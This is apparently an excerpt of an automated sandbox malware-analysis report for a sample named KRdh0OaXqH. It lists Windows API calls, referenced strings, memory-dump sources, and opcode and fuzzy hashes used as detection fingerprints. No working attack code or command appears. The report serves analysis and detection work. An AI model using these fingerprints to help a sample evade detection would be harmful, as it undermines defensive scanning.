                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                            • String ID: @
                                                                                            • API String ID: 3749476976-2766056989
                                                                                            • Opcode ID: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                            • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                                            • Opcode Fuzzy Hash: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                            • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                                            APIs
                                                                                            • 74D31520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                                            • 74D31500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                                            • 74D31540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: D31500D31520D31540
                                                                                            • String ID: j]I
                                                                                            • API String ID: 1003763464-3121892809
                                                                                            • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                            • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                                            • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                            • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastProcess
                                                                                            • String ID: XtE$ptE
                                                                                            • API String ID: 2919029540-3149052308
                                                                                            • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                            • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                                            • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                            • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                                            APIs
                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 395431579-1506664499
                                                                                            • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                            • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                                            • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                            • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                                            Strings
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                                            • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                                            • PendingFileRenameOperations, xrefs: 00454F5C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                            • API String ID: 47109696-2115312317
                                                                                            • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                            • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                                            • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                            • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
                                                                                            • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
                                                                                            • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                            • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                                            • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                            • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                                            • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                            • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                                            • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                            • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                                            APIs
                                                                                            • GetMenu.USER32(00000000), ref: 00421371
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu
                                                                                            • String ID:
                                                                                            • API String ID: 3711407533-0
                                                                                            • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                            • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                                            • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                            • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 601730667-0
                                                                                            • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                            • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                            • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                            • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                            APIs
                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                            • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                            • String ID:
                                                                                            • API String ID: 4071923889-0
                                                                                            • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                            • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                                            • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                            • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                            • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                            • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A14620A480A570EnumFonts
                                                                                            • String ID:
                                                                                            • API String ID: 2780753366-0
                                                                                            • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                            • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                            • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                            • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                            APIs
                                                                                              • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                                            Strings
                                                                                            • EndOffset range exceeded, xrefs: 0045BAED
                                                                                            • NumRecs range exceeded, xrefs: 0045BAB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlush
                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                            • API String ID: 3593489403-659731555
                                                                                            • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                            • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                                            • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                            • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                                            APIs
                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                                              • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                              • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                              • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049708E), ref: 00409B88
                                                                                              • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                              • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                                              • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                              • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                              • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                                              • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                              • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                              • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                              • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                              • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                              • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                              • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                              • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                              • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                              • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                              • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                              • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                                              • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                              • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                              • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                                              • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                            • String ID: Setup
                                                                                            • API String ID: 291738113-3839654196
                                                                                            • Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                            • Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
                                                                                            • Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                            • Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                            • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A15940CurrentThread
                                                                                            • String ID: RzE
